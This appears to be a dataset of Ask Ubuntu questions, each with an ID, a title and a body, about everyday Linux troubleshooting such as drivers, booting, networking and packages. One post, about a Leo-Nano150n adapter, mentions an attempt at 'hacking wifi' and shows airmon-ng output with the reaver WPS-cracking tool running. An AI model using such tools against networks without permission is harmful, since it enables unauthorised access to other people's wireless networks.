462305	intellij idea not opening because of jdk/bin/java	i am relatively new to ubuntu . i am using idea intellij from jetbrains for developing applications with gwt and java . recently i have installed ubuntu 14.04 and everything works fine but idea 13 . i have jdki586-1.7 and i have installed it using this tutorial . then i have extracted intellij to my home directory and tried to launch idea.sh from terminal with : ./idea.sh from path/to/idea/bin directory . but , it gave me this error : ./idea.sh : 1 : eval : /usr/local/java/jdk1.7.0_51/bin/java : not found i have searched through the internet , but could n't find similar topic . any suggestion would be appreciated . thanks in advance for your answer .
462306	can i have android on the phone but ubuntu on the computer when it is plugged in ?	is it possible to have the android os on your phone but when it is plugged into a computer the computer will run ubuntu ? also , does it support os x ?
462312	squeeking noise issue with asus laptop . found working solution for windows , now how to do this on ubunutu ?	my asus laptop makes a high pitch squeeking noise/sound . it turns out that is has something to do with the cpu and its power saving settings . i have my laptop on dual-boot with windows 7 and ubuntu 14.04 lts . for windows 7 i found this applicable and working solutions ; now how can i fix this irritating sound in ubuntu ?
462318	aod255 netbook wireless connection legitimation problem	following problem : i tried to install ubuntu 14.04 lts on an acer aspire one d255 because the pre-installed windows 7 starter was running annoyingly slow . ubuntu is way faster , but now i got a new problem : i ca n't connect to the wireless lan . everytime i try ubuntu asks me for the legitimation . when i type in the wpa2 passphrase it looks like it would try to connect , but only a few seconds later it asks me again for the key . how can i connect anyway to the wireless lan ? google was n't very helpful in this topic.. further information : the ethernet runs just fine . the wireless adapter is : qualcomm atheros ar9285 the kernel driver in use is : ath9k i am are using the router speedport w 724v wicd does n't work either . i have checked if the passphrase is correct . five times . i 'm a complete linux noob , please be gentle . if you need more information please tell me . could you please help me in this issue ? best regards , hankjw .
462319	how to run a python definition inside a .py file from the shell ?	my function sits inside a .py file with the very same name as the function : emp @ emp : ~ $ python ~/dropbox/emp/python/stromkosten_pro_jahr.pyempedokles @ empedokles : ~ $ stromkosten_pro_jahr ( 20,3 ) bash : syntaxfehler beim unerwarteten wort âť20,3âť emp @ emp : ~ $ where 's the error ?
462322	time out connecting to wi fi network	my wifi connection works normally in most networks , but i have a problem connecting to a speficic network . i can connect to this network with other devices , using the same wpa password . other people can connect just fine . i get the following in /var/log/syslog when trying to connect to this network using network manager : may 7 15:24:22 box kernel : [ 320056.009993 ] wlan0 : direct probe to c2:9f : db:8d:83:7f ( try 1/3 ) may 7 15:24:22 box kernel : [ 320056.211818 ] wlan0 : direct probe to c2:9f : db:8d:83:7f ( try 2/3 ) may 7 15:24:22 box kernel : [ 320056.416081 ] wlan0 : direct probe to c2:9f : db:8d:83:7f ( try 3/3 ) may 7 15:24:22 box kernel : [ 320056.620315 ] wlan0 : authentication with c2:9f : db:8d:83:7f timed out the full output is here : http : //paste.ubuntu.com/7410406/ how can i get more information to debug this problem ? thank you
462326	upgrade ubuntu server 11.04 signature error	hope somebody can point me in the right direction . when i do a do-release-upgrade i get an error about signature . sudo do-release-upgrade checking for a new ubuntu release your ubuntu release is not supported anymore . for upgrade information , please visit : http : //www.ubuntu.com/releaseendoflife err upgrade tool signature 404 not found [ ip : 91.189.91.14 80 ] err upgrade tool 404 not found [ ip : 91.189.91.14 80 ] fetched 0 b in 0s ( 0 b/s ) warning : root : file 'oneiric.tar.gz.gpg ' missing failed to fetch fetching the upgrade failed . there may be a network problem . does anybody know how to fix this ?
462329	hp laserjet 1020 plus printer not working in ubuntu 14.04	i have upgraded to ubuntu 14.04 . hp printer 1020 plus installed but device manager says not found . i can not print . can somebody help me out
462330	dualbooting windows 8.1 with ubuntu 14.04 ( current os )	i have a dell inspiron 15r 64-bit laptop . i had windows 8.1 on it . while installing ubuntu 13.04 , i accidentally selected the option to erase everything on the disk and install ubuntu , and as a result , my entire hard-disk was formatted as one partition on which ubuntu was installed ( thus , no windows now ) . after booting up the laptop , an error comes as `` no boot device found . press any key to reboot . '' this probably happens because windows is no longer there , and it 's bootloader is still there ( ? ) . to boot to ubuntu , i have to either select it manually in the boot options menu during startup by pressing the f12 key , or by setting up the boot option in my bios settings to uefi instead of legacy . if i select the uefi boot option , then it directly boots up into ubuntu , and this is what i 'm currently using . i recently upgraded my ubuntu to 14.04 , and the situation is still the same . now , i want to install windows 8.1 over my current system ( along with ubuntu 14.04 ) . the problem is i already have a windows bootloader ( ? ) that 's somehow left because of formatting of the hard-disk previously . i do n't want to take any chances , so i 'm posting this question . i have the image file ( iso ) of windows 8.1 . how do i go about installing windows 8.1 along side with ubuntu 14.04 ( already present ) ? thanks ! this is the output of df-h in terminal : filesystem size used avail use % mounted on /dev/sda2 451g 163g 265g 38 % / none 4.0k 0 4.0k 0 % /sys/fs/cgroup udev 3.9g 4.0k 3.9g 1 % /dev tmpfs 786m 1.3m 785m 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 3.9g 788k 3.9g 1 % /run/shm none 100m 52k 100m 1 % /run/user /dev/sda1 487m 7.3m 479m 2 % /boot/efi -edit- added information in response to rod smith 's answer . here 's the output for sudo parted /dev/sda print : model : ata wdc wd5000lpvt-7 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 512mb 511mb fat32 boot 2 512mb 492gb 491gb ext4 3 492gb 500gb 8453mb linux-swap ( v1 )
462333	where can i download xsltproc that is compatible with ubuntu 12.04	where can i download xsltproc that is compatible with ubuntu 12.04 ? i need this tool to install my epson perfection v500 photo scanner .
462334	remove cairo-dock ( gnome ) desktop environment from the login	i use ubuntu 14.04 lts version its login is very nice but after i installed cairo-dock , cairo-dock ( gnome ) desktop environment got added and i can choose either unity or cairo-dock ( gnome ) desktop environment but i do n't want to use cairo-dock ( gnome ) desktop environment so i want to remove that cairo-dock option from login page . i tried removing it by uninstalling cairo-dock desktop integration packages but the cairo-dock core is also uninstalling with it but i want to use cairo-dock . i also tried removing it from the cairo-dock settings but when i open settings as standard user the gnome option is not accessable and when i open settings as root user the gnome option is not viewable . so please can some suggest me how to remove that option from the login screen . thanks in advance .
462337	could n't install npm on ubuntu	tried to install nodejs and npm on ubuntu 12.04 . i googled and did it . now , i could not install npm on machine . sudo apt-get install npm which gives me this the following packages have unmet dependencies : npm : depends : nodejs but it is not going to be installed depends : nodejs-dev depends : node-request but it is not going to be installed depends : node-mkdirp but it is not going to be installed depends : node-minimatch but it is not going to be installed depends : node-semver but it is not going to be installed depends : node-ini but it is not going to be installed depends : node-graceful-fs but it is not going to be installed depends : node-abbrev but it is not going to be installed depends : node-nopt but it is not going to be installed depends : node-fstream but it is not going to be installed depends : node-rimraf but it is not going to be installed depends : node-tar but it is not going to be installed depends : node-which but it is not going to be installed e : unable to correct problems , you have held broken packages .
462338	cm6571 usb audio codec	the cmedia cm6571 usb audio codec is not recognized with the power up in some kernels . it is recognized after start up by unplugging and plugging the usb cable only . did anybody use this audio codec with ubuntu ?
462342	steam does not pop-up	i have installed steam-launcher from the software center and installed some software that it required ( mesa ... ) but when i want to start steam nothing happens.i use ubuntu 14.04
462345	ubuntu 14.04 system messed up after kernel update	yesterday i updated my 12.04 to 14.04 which went very well except some smaller issues . today is installed the nvidia package 337 ( through the additional drivers app ) and rebooted , everything was just fine . after some hours and several reboots ( everything was fine until now ) , i thought to update from the older kernel version 3.5 , wich was still installed and active from 12.04 , to the actual kernel version 3.13le also . the update itself went well but after that i was stucked at bootsplash and i got an errormessage that the uuid is not yet ready . okay i got my livecd and repaired the grub installation . after that i was able to boot to the login screen . i was happy and tried to login but keyboard and mouse was gone . i rebooted now several times , blacklisted driver , enabled blacklisted ones for usbkbrd and usbmouse but no way . at the moment i reach the bootsplash my keyboard/mouse are gone . im not able to log in and im also not able to start a command line . the recoverymode is exactly the same . im happy to have centos also installed so i can access the system . xorg.0.log shows errros about the nvidia driver is not found . all .conf files depending from the nvidia installation in /etc/modprobe.d/modules are broken . i was just wondering why because i already used the nvidia driver yesterday on the old kernel . the problems occurs after the kernel update . for me it seems that the kernelupdate brings that lucky situation : - ) any hints are welcome . is there anything an could do from centos ? i will now try to blacklist all my roccat hardware which i had also installed and see how that works . edit the network is also disabled from what i can say here
462349	missing dependency when installing canon pixma mx330 drivers from michael-gruz ppa	i am attempting to install a canon pixma mx330 ( multi-function ) all-in-one on ubuntu 14.04 . i found a page with instructions for installing canon printers , and i have followed the instructions to the point of installing the actual driver without any errors . when i attempt to install the mx330series driver i get the following error message : charles @ charles-gn689aa-aba-m8277c : ~ $ sudo apt-get install cnijfilter-mx330series reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : cnijfilter-mx330series : i386 : depends : libtiff4 : i386 ( > 3.9.5-3~ ) but it is not installable e : unable to correct problems , you have held broken packages i have downloaded and attempted to install libtiff4 , but my system tells me it is already installed . what steps do i need to take to get the mmx330 driver installed ? thank you .
462351	unable to to locate package apt-fast	this is what i tried : $ sudo add-apt-repository ppa : apt-fast/stable $ sudo apt-get update ... ... ... .something something ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... ... .. w : failed to fetch http : //ppa.launchpad.net/apt-fast/stable/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found w : failed to fetch http : //ppa.launchpad.net/apt-fast/stable/ubuntu/dists/trusty/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . i then tried $ sudo apt-get install apt-fast but it says : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package apt-fast
462352	chromebook to ubunt 12.04 through xrdp	when i try to connect to my ubuntu machine using the vnc app for my chromebook . the connection is denied unless i connect to ubuntu through anther device ie windows machine or my android rdp app . i am just using this to connect locally over my own network . any clues would be helpful . thanks
462355	lenovo bluetooth keyboard not pairing on ubuntu 14.04	i have a brand new lenovo thinkpad 14.04 . i also ordered a bluetooth keyboard . when i start the bluetooth app in ubuntu , it quickly finds the keyboard . when i try to pair with it , though , it generates a number for me to type on the keyboard . i type the number , press enter , and yet it fails to pair . what could be the problem here ? ( incidentally , after much gnashing of teeth , i inadvertently managed to completely wipe out the windows 8.1 that came with the computer so it 's all ubuntu now . ) edit : hmm : i see a lock on the bluetooth indicator . this sounds like it could be related . not sure what to do about it . i did n't see anything about locking in the bluetooth app . i 'm a bluetooth noob , by the way .
462360	macbook air - how to install a dual bootable ubuntu 14.04 lts	on my macbook air 10.9.2 without crashing the current setup , how can i install as dual boot : ubuntu 14.04 lts ? ( can anyone please advise some step by step please )
462361	xubuntu blank screen after wakeup	xubuntu 14.04 . after wake up from sleep , it asks to enter password . i entered the passw . and screen goes black . on ubuntu 14.04 waking up was just ok. lenovo e330 laptop with intel hd graphics . add : if lid was closed , not clicked sleep
462367	boot problem with multiple drives : error : attempt to read or write outside of disk 'hd0 '	there are already a few questions on the matter , but none have really helped , so i 'm adding another . my situation is this . i have a standard desktop build . i7 , asus rog motherboard , and a 512gb ocz vector ssd . all pretty new , top of the line stuff . the computer worked perfectly two days ago . single ext4 partition and a single swap partition , all pretty standard . today , i moved locations . just unplugged and replugged everything in . when i try to boot up , i get the grub error error : attempt to read or write outside of disk 'hd0 ' and then i go into a grub-recovery command line tool . i can see my devices ( hd0 ) , ( hd0 , msdos # ) , but if i try to ls any of then , the tool reports filesystem not recognized . i can boot off of a thumb drive and see the entire filesystem there , intact , so the data has definitely not been corrupted in any way . no matter what i do , this is the situation . i 've erased , reformatted , and reinstalled ubuntu on my drive , but no change . even stranger , i can boot the drive only if i plug into a 3gb/s sata port on the motherboard , not a 6gb/s ( as i have been doing for 8 months now ) . i still see the same grub message , but somehow it gets past those and will boot up ubuntu . i 've done this process with 12.04 , 13.10 , and 14.04 . same behavior . what makes matters even worse is the fact that i saw this last week on a completely different computer setup . i moved locations , plugged everything back in that had been working for a year ( moving very often throughout ) , and all of a sudden grub wo n't let me boot . this makes no sense to me . my question is this : what does this error really mean ? it seems obvious that grub is having some sort of issue , but how can it arise just from unplugging and re-plugging in hardware ? it has happened multiple machines with different hardware , so i have to think this is something within grub ... how does grub/the boot record become corrupted in such a way to cause this behavior ?
462368	when i create .desktop files , they do n't get found by trusty 's dash	magnifier not found by trusty 's dash though manage launcher ( both variants ) are . i 've tried creating magnifier.desktop both with manage launcher , manage launcher ( administrator ) & arronax . root @ johndesktop : /home/john # ls -l /usr/share/applications/ma* -rw-r -- r -- 1 root root 142 may 7 15:35 /usr/share/applications/magnifier.desktop -rw-r -- r -- 1 root root 322 oct 1 2013 /usr/share/applications/manage launcher ( administrator ) .desktop -rw-r -- r -- 1 root root 281 oct 1 2013 /usr/share/applications/manage launcher.desktop
462370	wwan / qmi_wwan.ko / network ip config	i am trying to get a new wwan module working on ubuntu 12.04 . i am relatively new to modern linux - i wrote linux drivers `` back in the day '' . these days i primarily write osx drivers for wwan modules from sierra , pantech , lg , etc . i 've spent 2 weeks on this problem and i am no closer to pinging a url then i was when i started . i am working with a sierra 7355 module . i thought i could just add the vid/pid to the device table in the qmi_wwan.c module , build the driver , install it and i 'd be good-to-go . after doing that i discovered that the driver would not load because of a module version mismatch . that necessitated a kernel rebuild to get the two in sync . i have my own qmi code - do n't ask why , i ca n't say here . anyway , once i got the driver loading for the 7355 , i then got my qmi code working . it works perfectly . most important i can connect and disconnect the module from the net . at first i thought i could just use dhcp after bringing the interface up and let the network stack configure my ip address , router , subnet mask and dns addresses . that does n't seem to work - i do n't know why . i do n't see any traffic from the pc to the device . figuring that maybe that was n't going to work , i added code to use libnl to configure the net and then overwrote the resolv.conf file to add the dns ( nameserver ) addresses . that got me a little farther - i can now see ip traffic between the 7355 and the pc but ping still fails and i ca n't browse . this is my current state - i 've been stuck on this problem for 2 weeks . i have read every article on the net related to linux ip configuration - nothing i have tried has worked . one thing to mention is that the net ip configuration has to happen programatically - this device will be used in a headless application . so , since i am not the expert here , i 've decided to ask the community for suggestions . i 'll try anything and i 'm hoping one of you will get me online.. thanx - alec
462371	how to combine partition created by failed ubuntu installation with that created by a subsequent installation	i tried installing ubuntu 14.04 ( dual boot with windows 7 ) , but the installation failed . i tried again and was successful , but then realised that i still had the partition from the previous attempt . i have tried to use gparted to shrink this partition in order to expand that of the successful installation , but it wo n't allow me to do so ( resize option greyed out ) . i also tried deleting all the items contained therein - they no longer show in nautilus , but the free space has not increased ) . how can i combine these two partitions ?
462372	internet slows down random times	when i use internet it slows down at random times . it does n't happens that much , but still i find it annoying . my normal internet speed is around 2 to 3 mbps . at other times it goes to 50 to 200 kbps download speed . i do n't think so that somethings wrong with my internet server . i use wireless connection for internet . using ethernet connection goes around 100 to 450 kbps download speed . ask for me what you need to know .
462374	can ubuntu cope with bad ram ?	i have installed ubuntu on a computer which hat bad/defective ram ( memtest86+ ) showed that later . the thing is i did not have any problems with ubuntu 14.04 while windows 7 installed on the same machine bluescreen crashed constantly . i know that there is a badblocks/badram feature possible in the linux kernel and in grub . can somebody confirm that the good ( in comparison with windows 7 ) crash-free experience was more than just luck ? i.e . does ubuntu probe ram during install/boot and prevent defective ram to disrupt system stability ? or was i just lucky that ubuntu did not crash ?
462380	is it possible to periodically repeat a dhcp request ?	i have my ubuntu server set to get addresses from a dhcp server . however , if that dhcp server is not currently active , the server will just stay with no address . is there some mechanism to periodically send dhcp requests ?
462381	ca n't mount ntfs drive `` the disk contains an unclean file system ''	am getting an error when i try to access my ntfs drive from ubuntu . unable to access âmy drivdâ error mounting /dev/sda6 at /media/ububtu/media center : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda6 '' `` /media/rolindroy/media center '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda6 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option plesae help . thank you .
462382	unity will not log on	unity will only log onto the guest version on my computer , when i type in my password normally it momentarily flashes to a black screen then return to the login screen . when running unity through terminal , i find : stop : unknown job unity-panel-service i am currently running ubuntu 14.04 and this bug seemed to arise after i attempted to install the mate desktop .
462385	mounted network share does not list all subfolders	i am running ubuntu server cli i386 version and have mounted several network shares by editing the /etc/fstab file and then issuing a mount -a command . all 4 of these shares work , except i am having a curious problem with the largest one in particular . the share in question has about 186 folders in it , but when i cd into that directory and ls to see the contents , only 116 are shown . everything after the 116th folder , listed alphabetically , is not shown . at first i wondered if maybe there was just a limit to the amount of items that are shown by default so i ran ls -a -l and it still shows only 116 items ( 118 if you count the . and .. - which suggests 116 is n't any sort of hard limit ) . i know what items it 's not showing so i tried to cd directly into one of the `` missing '' folders just to see if i could get there and i can . i tried several , actually , and am able to access them all . i can see and access these on several windows machines . the line for this particular mount from the fstab file is as follows ( maybe i am missing an option ? ) //designation/share\040name /media/shares/share cifs credentials=/home/username/.credentialfile , iocharset=utf8 , sec=ntlm 0 0 any help or explanation would be greatly appreciated . thanks guys . edit some other relevant information : of the 4 shares , 1 is connected directly as nas , 2 are connected to a windows pc and shared , and the one that i am experiencing this problem with is an external drive connected directly to the router via usb the share i am having a problem with also has a space in the share name where as the others do n't . at first the fstab file did n't like this , so i escaped the space via \040 edit 2 i fixed my issue . playing on @ terdon 's suspicion i tried to ssh into my router to see if i could ls the contents directly there but did n't have an ssh server running on it . ended up flashing it with custom firmware . ssh 'd in and i can ls the contents there now . went back over the ubuntu server and i an also ls the contents there ( after fixing up the fstab ) . not sure exactly what the problem was but had something to do with the router . the new firmware renamed the share and replaced the space with an underscore so it could have either been the space , or the official firmware for my router had a bug .
462387	nautilus missing context-menu button ( gear icon ) in ubuntu 14.04	after the upgrade from ubuntu 13.10 to 14.04 in nautilus ( 3.10.1 ) , in the toolbar it is missing the context-menu button ( those with a gear icon ) in the upper right corner , near the search icon . to be clear the button highlighted in red here : this was present in nautilus in ubuntu 13.10 . is it normal that now is it disappeared ? is there a way to add this button ?
462390	can not install `banshee-extension-lyrics`	i am trying to install banshee-extension-lyrics extension . by sudo apt-get install banshee-extension-lyrics . but the i got this error as below . rashed @ rashed-hp-430-notebook-pc : ~ $ sudo apt-get install banshee-extension-lyrics [ sudo ] password for rashed : reading package lists ... done building dependency tree reading state information ... done package banshee-extension-lyrics is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'banshee-extension-lyrics ' has no installation candidate i tried i ca n't install the software i want to ! but i got same error . what should i do now , please help .
462391	juju bootstrap node ca n't access ubuntu archives via maas	i am trying to install maas and juju on virtualbox . the network configuration of virtualbox is set to nat network . everything is just fine . i am able to pxe boot . but when i start juju bootstrap , the node gets stuck when it is trying to download ubuntu archive mirrors . i set the maas server to manage the dhcp and dns . it looks like the node can not access the internet . i have checked the node and it got the correct ip from maas . that means the dhcp works fine . i think the problem is the dns . could someone please help ? if you need more details , please let me know . this is the output of juju bootstrap -v launching instance warning picked arbitrary tools & { `` 1.18.2-precise-amd64 '' `` https : //streams.canonical.com/juju/tools/releases/juju-1.18.2-precise-amd64.tgz '' `` d3770207f2b7767e062d56e47dbe95d1f00c64e6033aad42cfc0a467af066345 '' % ! q ( int64=5359827 ) } - /maas/api/1.0/nodes/node-9d17c260-d5f9-11e3-b46b-08002781e4ac/ waiting for address attempting to connect to maas-node-0.maas:22 attempting to connect to 10.0.2.109:22 then i start my node manually ( because i do n't know how to configure the power type of virtualbox to allow it start automatically ) , the node begins to boot and stuck at checking ubuntu archive mirrors . the mirror archive is archive.ubuntu.com/ubuntu more details : i am able to ping google.com on my region-controller . but when i run juju bootstrap and ping google again , it shows that unknown host name google.com .
462396	boot problem after updating to 14.04	i 've installed 14.04 ( from 11.10 ) , it worked first , than i tried to install the 64-bit-version , which does n't seem to be able to boot because of my old bios , which does not allow `` efi '' boot . now i reinstalled 14.04 32 bit , but still get a grub rescue prompt when trying to boot . running boot-repair from live ubuntu did n't help . so here 's the report boot-repair made : http : //paste.ubuntu.com/7410732 hope someone can help me ...
462397	launching a python script in idle works but in terminal i get a smtp instance has no attribute 'send_message ' error	i have a script that results in an email being sent out with smtplib.smtp python module . when i run it from within idle is sends fine with no error messages . i am trying various ways to automate it with crontab to go everyday at 10am . if i run it from terminal , i get an error : $ python endofmonth.py traceback ( most recent call last ) : file `` endofmonth.py '' , line 74 , in < module > s.send_message ( msg ) attributeerror : smtp instance has no attribute 'send_message' why would it work in idle but not when called from terminal ?
462399	digigram driver in 14.04 lts	i am trying to install digigram vx222 driver and i get the following error . somewhat new to ubuntu , any thoughts ? root @ panthersspanish : /usr/src/alsa/install-vx # sh installvx-alsa1.0.2 installvx-alsa1.0.2 : 21 : installvx-alsa1.0.2 : syntax error : `` ( `` unexpected
462403	how to forward all usb stuff to virtualbox ?	the generel problem of virutalization usb passthrough is that both host and guest system can not deal at the same time with the usb device . the solution i seek would be to disable most/all usb handling in the host ( a ubuntu system ) and leave the usb devices completly to the guest system . i reckon i need to adjust lots of udev stuff , right ? i would be happy if somebody would be able to share the info how to do that .
462405	adding wallpapers to ubuntu 13.10	i want to add more wallpapers to my ubuntu 13.10 . is there any way to add more wallpapers ? i do n't know how to do it ?
462406	keyboard layout indicator `` work '' but the keyboard layout does n't actually switch	in xfce , when i press alt+shift keyboard indicator switch between us and ru but the layout does n't switch actually . xubuntu 14.04 i 've tried : different keyboards ( does n't help ) . this problem appeared after i remapped a certain key following this : how do i remap certain keys ? update . the problem affects kde desktop environment too . in unity everything is ok .
462412	youtube buttons do n't work in chromium	i 've been using youtube through chromium on raring for over a year now . suddenly , yesterday , some buttons on youtube stopped working . when viewing a particular video , the buttons for `` show more '' , `` add to '' , etc . do nothing . clicking my profile name/icon ( upper-right corner ) does nothing . when i search in youtube , only the first 5 or 6 results show a thumbnail . the rest have a blank white box . similarly , if i just go to youtube.com , none of the video thumbnails load . attempted solutions : if i use firefox , everything works fine i cleared the cache for chromium . nothing changed . checked for chromium updates . is already up-to-date . aptitude reinstall ... . nothing changed . checked/installed/updated adobe flash player and pepper flash . nothing changed . disabled all extensions except for youtube adblock . nothing changed . checked youtube from my work computer ( debian ) with chromium - works fine .
462413	ubuntu 12.04 using vlans on bond0	i have tried and read just about every article on how to setup vlans with bonds , however , i can not seem to get it working . i am running : ubuntu 12.04.4 lts on a ibm x3650m4 with 2 intel 10gb nics . when i installed the os , i did not have access to the internet and i had to mount an iso with vlan_1.9-3ubuntu6_amd64.deb on it to get vlan support . i ran modprobe 8021q and added 8021q to /etc/modules . i am able to configure eth1 and eth6 independently to use the vlan ( we will call it vlan1 ) and i did update and upgrade ubuntu as well as aptitude update and upgrade . my interfaces file looks like this : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto eth1 iface eth1 inet manual bond-master bond0 auto eth6 iface eth6 inet manual bond-master bond0 # start bond0 auto bond0 iface bond0 inet manual bond-mode 4 bond-miimon 100 bond-lacp-rate fast ( have tried slow as well ) mtu 11000 bond-slaves none # start vlan 1 auto bond0.1 iface bond0.1 inet static address 10.1.1.100 netmask 255.255.255.0 network 10.1.1.0 broadcast 10.1.247.255 gateway 10.1.1.3 dns-nameservers 10.1.1.10 vlan-raw-device ( the ip info is intentionally wrong ) whenever i try to bring up bond0.1 i get this error : set name-type for vlan subsystem . should be visible in /proc/net/vlan/config error : trying to add vlan # 1 to if - : bond0 : - error : operation not supported can not find device `` bond0.1 '' failed to bring up bond0.1 if i run vconfig add bond0 1 , i get this error : error : trying to add vlan # 1 to if - : bond0 : - error : operation not supported any ideas on how to fix this ?
462419	how to change indicator clock font size ?	ca n't find any way to change font of clock ( only ) located in indicators applet in ubuntu 14.04 . anyone ?
462421	is there a list of usb 4g modems that work `` as is '' in ubuntu ?	i 've been trying out different usb modems from different networks in portugal , and each time i get a new one it 's always a week-long adventure of trying to get it to work with ubuntu , which usually ends with me quitting after following many different suggestions online . is there a list of supported 4g modems somewhere that i can be confident will work just by plugging them into the pc without any further hacks or tweaks ?
462423	help with leo-nano150n drivers	i have installed leo-nano150n on my ubuntu 14.04 the error is that the signal regularly drops and disconnect on ubuntu but not in windows 7 i have installed drivers by this method it worked nice until i restart after restart i have the same problem.then i tried hacking wifi but it does not work i gives me an error root @ sultan-pc : ~ # airmon-ng start wlan0 found 5 processes that could cause trouble . if airodump-ng , aireplay-ng or airtun-ng stops working after a short period of time , you may want to kill ( some of ) them ! pid name 647 avahi-daemon , 650 avahi-daemon , 674 networkmanager , 789 wpa_supplicant , 6042 dhclient , process with pid 5656 ( reaver ) is running on interface wlan0 , process with pid 6042 ( dhclient ) is running on interface wlan0 , please help me .i am a noob in this things.if any can can give me any type of solution please .if any one wants any type of information please tell me . sorry for my bad english thank`s in advance
462428	14.04 trusty tahr lightdm no way to switch session	i installed trusty on my laptop . i like gnome shell more than unity . so i installed gnome shell via software centre . i have lightdm 1.10.0 installed on my system . unlike the previous version it does not help me to switch and view all the installed desktop sessions in my system . so i am unable to switch to any other session . i then switched to gdm . gdm only shows two options 1 . ubuntu 2 . system default . system default option does not load any desktop environment and stuck on a empty wallpaper . but i could do it via command line to load gnome-shell ( gnome-shell -- replace ) . what is the way to enable lightdm to give option to switch to different sessions other than unity ? why does not gdm include gnome session along with ubuntu and system default ?
462430	the ( un ) usual sound problem , with image	i 've just installed ubuntu alongside windows 7 . my audio was functional on windows , the card is an m-audio delta 2496 audiophile ; ubuntu seems to have installed the drivers autonomously during the os installation . everything seems okay , except for the fact that , er , there is no sound at all . i have n't adjusted any hardware settings and it works if i log on windows . i 've tried reinstalling alsa and i have checked all levels . this is what i get in the mixer : any ideas ?
462434	youtube controls missing	i 'm running 14.04 i 've noticed recently the control buttons are missing from all youtube videos i try to view . i can still click on and use the controls ( play , full screen , etc . ) but they are all invisible . only the playback time is visible and the volume control shows on mouseover . i 've tried reinstalling the flashplugin-installer package to no effect . right-clicking on the video gives me the html5 context menu so i suppose it 's not a flash problem in the first place . this problem is occurring in firefox , from chromium everything appears normally . 00:02.0 vga compatible controller : intel corporation core processor integrated graphics controller ( rev 02 ) subsystem : hewlett-packard company device 144c kernel driver in use : i915 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 )
462444	ubuntu 14.04 and qt5 : no qmenu objects show up !	i have installed the qt5 packages from the ubuntu ( 14.04 ) official repository : sudo apt-get install qt5-default qttools5-dev-tools appmenu-qt5 then i found this critical bug : qmenu objects do n't show up in the qt applications gui . you can reproduce this issue compiling and running these examples : http : //qt-project.org/doc/qt-5/qtwidgets-mainwindows-menus-example.html http : //qt-project.org/doc/qt-5/qtwidgets-mainwindows-application-example.html anyone else can confirm this issue or is it just me ? note : if i use the bundled qt5 installer directly from the qt project website , i do n't get this bug .
462449	update the system from terminal	i want to update my ubuntu 14.04 system from the terminal and i know that sudo apt-get update & & sudo apt-get upgrade are the commands but when i check the update manager kernel updates are still there . why is that ? and what can i do to update the kernel from terminal .
462452	libav : set a custom header in rtsp stream	i am trying to play a chunk of video retrieved from an axis m3004v camera . the camera is continuously recording video in an internal microsd card . that video receives a recordingid i can use to query . according to what it says on the axis api documentation ( on the edge storage and the video streaming vapix documents ) i can specify an start time and end time for the play through a custom header in the request . let 's say that video has been recording from 2014-05-01t00:00:00z until ... meh ... now . apparently , if i were able to send an rtsp request with : rtps : //camera_ip/axis-media/media.amp ? < parameter > = < value > headerfield1 : val1 < crlf > range : clock=2014-05-01t00:01:00z-2014-05-01t00:01:30z < crlf > i would get a 1 minute play from 00:00:01 to 00:00:02 . i 'm trying to set that custom header using avplay like this : avplay -f rtsp -rtsp_transport http \ -i `` rtsp : //user : password @ 192.168.1.5/axis-media/media.amp ? recordingid=20140505_000000_5e99_00408caabbcc '' -headers `` \nrange : clock=2014-05-01t00:01:00z-2014-05-01t00:01:30z\n '' \ -loglevel debug but when i try that , i get an option headers not found error : [ rtsp @ 0x7f4cb4005be0 ] video codec set to : h264 [ null @ 0x7f4cb4004e20 ] rtp packetization mode : 1 [ null @ 0x7f4cb4004e20 ] rtp profile idc : 4d profile iop : 40 level : 29 [ null @ 0x7f4cb4004e20 ] extradata set to 0x7f4cb40014e0 ( size : 29 ) ! [ rtsp @ 0x7f4cb4005be0 ] hello state=0 option headers not found . and avplay stops . i have n't been able to find any example on the web , but i 'd say that the option to pass custom headers to an rtsp stream was added to libav long time ago ( at least , according to this commit from 2011 ) maybe i 'm not passing the argument properly ? i have tried several variations to the line above , such as removing the -f rtsp part , change the -rtsp_transport to tcp instead of http , reorganizing the order of my arguments ... . nothing worked . nothing even produced a different error message . does anyone know how to pass custom headers to an rtsp request using libav ? i 'm on a lubuntu 14.04 ( amd64 ) and avplay is version 9.11-6:9.11-2ubuntu2 any help will be very appreciated . thank you in advance .
462453	meaning of different icons for usb flash drives	ubuntu uses at least three different icons for identifying usb storages . what are the criteria used to diferentiate those ? for instance , i have two nearly identical sandisk cruzer blade usb drives , one 4 gb and other 8 gb . ( the output of lsusb is the same for both : bus 001 device 009 : id 0781:5567 sandisk corp. cruzer blade ) . on linux , one is displayed with the flash drive icon and other with the generic usb storage icon . sometimes a third , purple icon is used too . what is the cause of this behavior ? are there other icons ? what are the rules for ubuntu picking different usb drive icons and what do they mean ?
462456	ubuntu 14.04 repeats the background voice for every input	i have installed the ubuntu 14.04 before a week , when ever i gave an input action it is repeated over male voice . example : if i press the f5 key then ubuntu produce the male voice as `` f5 '' . if i open a new window it will read the all the options and inputs . how can i disable this voice ? thanks .
462458	mouse cursor getting invisible in ubuntu & blinking as well as	im using ubuntu 12.10 , facing problem with blinked mouse cursor as well as invisible sometimes . it seems that a veil is present on my screen and the mouse gets hidden behind the veil . help me .
